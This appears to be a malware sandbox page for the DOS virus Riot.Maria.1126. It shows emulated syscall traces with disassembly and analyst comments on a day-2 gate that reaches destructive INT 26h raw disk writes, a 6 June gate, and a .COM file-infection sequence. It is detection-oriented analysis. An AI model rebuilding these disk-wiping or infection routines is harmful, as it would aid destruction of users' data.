Sample viewer

vx.netlux.org/Virus.DOS.Riot.Maria.1126


Syscalls:

Time Syscall Op Syscall Name
; Disassembly window printed at the return address of the DOS "Get date"
; call (op 42 in this trace). Get date returns DL = day of month,
; DH = month, CX = year, AL = day of week.
; The visible code is a date gate: when the day of month is 2 it reaches
; INT 26h (DOS absolute disk write, which bypasses the file system);
; on any other day it jumps straight to the ret at 0x12a80.
; Triage note: INT 26h issued by a .COM program is a strong indicator of
; a destructive payload. The run-settings line of this trace lists Day 1
; (presumably the emulated clock -- confirm), and the rows that follow
; continue with ordinary file calls, so the gated path does not appear
; to execute in this run.
2018-12-17T23:07:59.920025955Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2    ; day of month == 2 ?
0x12a5d: je 0x12a62                     ; yes -> disk-write path
0x12a5f: jmp 0x12a80                    ; no  -> return to caller
0x12a61: nop
0x12a62: cli                            ; interrupts off before the raw write
0x12a63: mov ah, 2                      ; AL (INT 26h drive number) is not set in this window; Get date leaves day-of-week there -- confirm
0x12a65: cdq                            ; NOTE(review): this is 16-bit code, so the opcode presumably acts as cwd (DX = sign of AX = 0) -- confirm against raw bytes
0x12a66: mov cx, 0x100                  ; INT 26h: CX = number of sectors (256)
0x12a69: int 0x26                       ; absolute disk write; DS:BX buffer is whatever the caller left
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3                      ; INT 26h drive number (0 = A:), so 3 = D:
0x12a71: mov cx, 0x2bc                  ; sector count 0x2bc (700)
0x12a74: mov dx, 0                      ; starting sector 0
0x12a77: mov ds, word ptr [di + 0x63]   ; DS:BX = source buffer for the write
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62                   ; NOTE(review): printed target is exactly 0x10000 above 0x12a62; likely a 16-bit offset wrap back to the INT 26h sequence -- confirm
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]        ; follows the ret; not reached by fall-through, may be data or the next routine
2018-12-17T23:07:59.923486954Z 71 PC: 12b49 | Get current directory
2018-12-17T23:07:59.927534131Z 59 PC: 12b54 | Change current directory
2018-12-17T23:07:59.932427691Z 26 PC: 12c08 | Set disk transfer address
2018-12-17T23:07:59.934549001Z 78 PC: 12c16 | Find first file
2018-12-17T23:07:59.942284103Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:07:59.949932135Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
; Disassembly window printed at the return address of the DOS "Get time"
; call (op 44). Get time returns CH = hour, CL = minute, DH = seconds,
; DL = hundredths of a second.
; The code derives one byte from the clock, stores it in the program's
; own data, then prepares the host file for modification: clear its
; attributes, close the handle, reopen it read/write. The trace rows that
; follow (attributes, close, open, three short writes, seek, a 1126-byte
; write, file date/time, close, attributes) match this sequence; 1126 is
; also the size in the sample name.
; Detection note: attribute clear -> reopen read/write -> write to a .COM
; file -> touch the file date/time and attributes again is a typical
; file-infector pattern; the final two calls presumably restore the
; original values -- confirm, the trace does not show get vs set.
2018-12-17T23:07:59.957457433Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh    ; DL = hundredths + seconds
0x12c90: je 0x12c8a                     ; result zero -> branch back (0x12c8a is outside this window; presumably retries Get time)
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]       ; SI = 0x115 + word stored at DS:0x106
0x12c99: mov byte ptr [si], dl          ; store the time-derived, non-zero byte; presumably a per-copy key/variable byte -- confirm
0x12c9b: mov ax, 0x4301                 ; INT 21h AX=4301h: set file attributes
0x12c9e: xor cx, cx                     ; CX = 0 -> clears read-only/hidden/system bits
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca                   ; DS:DX = path string at SI + 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e                   ; INT 21h AH=3Eh: close handle in BX (BX set before this window)
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02                 ; INT 21h AH=3Dh: open, AL=2 -> read/write; DX still points at the path
0x12caf: int 0x21
0x12cb1: jb 0x12c63                     ; carry set = open failed -> error path outside this window
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax     ; save the returned handle at ES:[DX + 0x63]
0x12cb9: xchg ax, bx                    ; handle -> BX for the calls that follow
0x12cba: mov ah, 0x40                   ; INT 21h AH=40h: write; the INT itself is past the end of this window
2018-12-17T23:07:59.961848058Z 67 PC: 12ca8 | Get or set file attributes
2018-12-17T23:07:59.983866779Z 62 PC: 12cac | Close file
2018-12-17T23:07:59.986247916Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:07:59.995060874Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:00.003341855Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:08:00.006801903Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:08:00.009728369Z 66 PC: 12cf4 | Move file pointer
2018-12-17T23:08:00.01254735Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T23:08:00.015922888Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-17T23:08:00.025530773Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T23:08:00.02879481Z 87 PC: 12d0d | Get or set file date and time
2018-12-17T23:08:00.03030625Z 62 PC: 12d11 | Close file
2018-12-17T23:08:00.039036219Z 67 PC: 12d22 | Get or set file attributes
2018-12-17T23:08:00.052354786Z 79 PC: 12c2a | Find next file
2018-12-17T23:08:00.055392517Z 61 PC: 12c42 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:08:00.063933777Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T23:08:00.080681348Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-17T23:08:00.08478417Z 67 PC: 12ca8 | Get or set file attributes
2018-12-17T23:08:00.096852139Z 62 PC: 12cac | Close file
2018-12-17T23:08:00.100158406Z 61 PC: 12cb1 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:08:00.10870953Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:00.111912005Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:08:00.115507492Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:08:00.119189969Z 66 PC: 12cf4 | Move file pointer
2018-12-17T23:08:00.121277475Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T23:08:00.124222916Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-17T23:08:00.134969847Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T23:08:00.137515674Z 87 PC: 12d0d | Get or set file date and time
2018-12-17T23:08:00.139300933Z 62 PC: 12d11 | Close file
2018-12-17T23:08:00.148472693Z 67 PC: 12d22 | Get or set file attributes
2018-12-17T23:08:00.159494534Z 79 PC: 12c2a | Find next file
2018-12-17T23:08:00.162513587Z 61 PC: 12c42 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:08:00.170280713Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-17T23:08:00.178256113Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-17T23:08:00.181049791Z 67 PC: 12ca8 | Get or set file attributes
2018-12-17T23:08:00.193170539Z 62 PC: 12cac | Close file
2018-12-17T23:08:00.195246247Z 61 PC: 12cb1 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:08:00.202832312Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:08:00.206697142Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:08:00.209657454Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-17T23:08:00.212594155Z 66 PC: 12cf4 | Move file pointer
2018-12-17T23:08:00.2153309Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T23:08:00.217784264Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-17T23:08:00.228104406Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-17T23:08:00.232443621Z 87 PC: 12d0d | Get or set file date and time
2018-12-17T23:08:00.23468396Z 62 PC: 12d11 | Close file
2018-12-17T23:08:00.244328278Z 67 PC: 12d22 | Get or set file attributes
; Disassembly window printed at the return address of a second DOS
; "Get date" call (op 42). Get date returns DH = month, DL = day, so
; DX == 0x0606 means 6 June.
; Only the first three instructions are certainly executed here: on a
; match control goes to 0x12d28, otherwise to 0x12d94. Both targets are
; outside this window. In this run the next trace rows are the
; "Change current directory" calls at 12d9f/12da6, which is consistent
; with the non-matching branch.
; Analyst caveat: the listing is a linear sweep from the return address,
; so everything after the two unconditional jumps may be data or
; misaligned code and should be re-disassembled from a known entry point.
2018-12-17T23:08:00.255522387Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606    ; month == 6 and day == 6 ?
0x12b73: je 0x12b78                     ; match -> second date-gated path
0x12b75: jmp 0x12d94                    ; no match -> continue normally
0x12b78: jmp 0x12d28                    ; date-gated routine, not shown on this page
0x12b7b: and ah, bh                     ; NOTE(review): from here to 0x12b86 looks like data decoded as code -- confirm
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl   ; NOTE(review): instruction boundary is probably misaligned here; a push bp / mov bp, sp prologue would fit the later [bp - 0x2c] use -- confirm against raw bytes
0x12b86: in al, dx
0x12b87: sub sp, 0x2c                   ; reserve 0x2c bytes of stack
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a                   ; INT 21h AH=1Ah: set disk transfer address
0x12b90: lea dx, word ptr [bp - 0x2c]   ; DTA = the stack buffer reserved above
0x12b93: int 0x21
0x12b95: mov ah, 0x4e                   ; INT 21h AH=4Eh: find first
0x12b97: mov cx, 0x10                   ; attribute mask 0x10 -> include directories
0x12b9a: mov dx, 0x1b8                  ; DS:DX = search pattern at offset 0x1b8; the INT is past the end of this window
2018-12-17T23:08:00.259166903Z 59 PC: 12d9f | Change current directory
2018-12-17T23:08:00.263992593Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:11.431000076Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:11.43354652Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:11.436232435Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:11.44004911Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:11.44143219Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:11.447218341Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:11.453417499Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:11.467009027Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:11.469250547Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:12.58704343Z 62 PC: 12cac | Close file
2018-12-25T12:45:12.590349125Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:12.596931829Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:12.7169035Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:12.719476841Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:12.722207257Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:12.723615077Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:12.725813637Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:12.844259131Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:12.846253287Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:12.847286824Z 62 PC: 12d11 | Close file
2018-12-25T12:45:12.910183804Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:12.980741088Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:12.983954828Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:12.991822718Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:12.998337974Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:13.000834252Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:13.050196834Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:13.052401475Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:13.058700267Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:13.061449945Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:13.064204706Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:13.06661999Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:13.068055115Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.070459398Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:13.120385981Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.122629424Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:13.124440951Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:13.182597693Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:13.471176235Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:13.474324038Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:13.480729948Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:13.584453206Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:13.588114245Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:13.754334731Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:13.756688578Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:13.764719545Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:13.767424871Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:13.769868663Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:13.773262929Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:13.774818126Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.776994467Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:13.853742968Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.855802695Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:13.857229075Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:13.986042465Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:14.179460225Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:14.181549114Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:14.186388732Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:11.448739371Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:11.451259969Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:11.453921313Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:11.457654581Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:11.458983285Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:11.469568848Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:11.480774279Z 63 PC: 12c54 | Read file or device (Read 8 bytes on handle 5)
2018-12-25T12:45:11.487279638Z 44 PC: 12c8e | Get time 0x12c8e: add dl, dh
0x12c90: je 0x12c8a
0x12c92: mov si, 0x115
0x12c95: add si, word ptr [0x106]
0x12c99: mov byte ptr [si], dl
0x12c9b: mov ax, 0x4301
0x12c9e: xor cx, cx
0x12ca0: mov dx, si
0x12ca2: add dx, 0xca
0x12ca6: int 0x21
0x12ca8: mov ah, 0x3e
0x12caa: int 0x21
0x12cac: mov ax, 0x3d02
0x12caf: int 0x21
0x12cb1: jb 0x12c63
0x12cb3: mov di, dx
0x12cb5: add di, 0x63
0x12cb8: stosw word ptr es:[di], ax
0x12cb9: xchg ax, bx
0x12cba: mov ah, 0x40
2018-12-25T12:45:11.489283957Z 67 PC: 12ca8 | Get or set file attributes
2018-12-25T12:45:12.587139124Z 62 PC: 12cac | Close file
2018-12-25T12:45:12.589759003Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:45:12.596701663Z 64 PC: 12cc4 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:45:12.599631733Z 64 PC: 12cd6 | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:12.602425182Z 64 PC: 12ceb | Write file or device (Write 2 bytes on handle 5)
2018-12-25T12:45:12.606481378Z 66 PC: 12cf4 | Move file pointer
2018-12-25T12:45:12.607989271Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:12.610626209Z 64 PC: 12a98 | Write file or device (Write 1126 bytes on handle 5)
2018-12-25T12:45:12.790363419Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:12.793685915Z 87 PC: 12d0d | Get or set file date and time
2018-12-25T12:45:12.795497961Z 62 PC: 12d11 | Close file
2018-12-25T12:45:12.88098556Z 67 PC: 12d22 | Get or set file attributes
2018-12-25T12:45:12.951078447Z 79 PC: 12c2a | Find next file
2018-12-25T12:45:12.95376309Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:12.960520402Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:12.967520266Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:12.969525875Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:13.018256743Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:13.02033923Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:13.026772555Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:13.029788747Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:13.03199923Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:13.033859467Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:13.03539844Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.037076646Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:13.084977251Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.086981965Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:13.088142021Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:13.141839258Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:13.250137126Z 79 PC: 12c2a | Find next file (See above)
2018-12-25T12:45:13.252991055Z 61 PC: 12c42 | Open file (See above)
2018-12-25T12:45:13.264179267Z 63 PC: 12c54 | Read file or device (See above)
2018-12-25T12:45:13.270183661Z 44 PC: 12c8e | Get time (See above)
2018-12-25T12:45:13.272515718Z 67 PC: 12ca8 | Get or set file attributes (See above)
2018-12-25T12:45:13.47038104Z 62 PC: 12cac | Close file (See above)
2018-12-25T12:45:13.472161513Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:45:13.479210115Z 64 PC: 12cc4 | Write file or device (See above)
2018-12-25T12:45:13.481683373Z 64 PC: 12cd6 | Write file or device (See above)
2018-12-25T12:45:13.484247032Z 64 PC: 12ceb | Write file or device (See above)
2018-12-25T12:45:13.487587529Z 66 PC: 12cf4 | Move file pointer (See above)
2018-12-25T12:45:13.488851526Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.490828736Z 64 PC: 12a98 | Write file or device (See above)
2018-12-25T12:45:13.646896857Z 42 PC: 12a5a | Get date (See above)
2018-12-25T12:45:13.648983977Z 87 PC: 12d0d | Get or set file date and time (See above)
2018-12-25T12:45:13.650306684Z 62 PC: 12d11 | Close file (See above)
2018-12-25T12:45:13.825964458Z 67 PC: 12d22 | Get or set file attributes (See above)
2018-12-25T12:45:13.948797606Z 42 PC: 12b6f | Get date 0x12b6f: cmp dx, 0x606
0x12b73: je 0x12b78
0x12b75: jmp 0x12d94
0x12b78: jmp 0x12d28
0x12b7b: and ah, bh
0x12b7d: movsw word ptr es:[di], word ptr [si]
0x12b7e: mov ax, 0x5c4c
0x12b81: add word ptr [di], ax
0x12b83: add byte ptr [di - 0x75], dl
0x12b86: in al, dx
0x12b87: sub sp, 0x2c
0x12b8a: push si
0x12b8b: jmp 0x12bfd
0x12b8d: nop
0x12b8e: mov ah, 0x1a
0x12b90: lea dx, word ptr [bp - 0x2c]
0x12b93: int 0x21
0x12b95: mov ah, 0x4e
0x12b97: mov cx, 0x10
0x12b9a: mov dx, 0x1b8
2018-12-25T12:45:13.950842834Z 59 PC: 12d9f | Change current directory
2018-12-25T12:45:13.955025756Z 59 PC: 12da6 | Change current directory

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":16046,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:45:11.699092429Z 42 PC: 12a5a | Get date 0x12a5a: cmp dl, 2
0x12a5d: je 0x12a62
0x12a5f: jmp 0x12a80
0x12a61: nop
0x12a62: cli
0x12a63: mov ah, 2
0x12a65: cdq
0x12a66: mov cx, 0x100
0x12a69: int 0x26
0x12a6b: jmp 0x12a6e
0x12a6d: nop
0x12a6e: cli
0x12a6f: mov al, 3
0x12a71: mov cx, 0x2bc
0x12a74: mov dx, 0
0x12a77: mov ds, word ptr [di + 0x63]
0x12a7a: mov bx, word ptr [di + 0x37]
0x12a7d: call 0x22a62
0x12a80: ret
0x12a81: lodsb al, byte ptr [si]
2018-12-25T12:45:11.702691386Z 71 PC: 12b49 | Get current directory
2018-12-25T12:45:11.704641766Z 59 PC: 12b54 | Change current directory
2018-12-25T12:45:11.70724452Z 26 PC: 12c08 | Set disk transfer address
2018-12-25T12:45:11.708472158Z 78 PC: 12c16 | Find first file
2018-12-25T12:45:11.712374701Z 61 PC: 12c42 | Open file (Filename = 'SLEEP.COM')
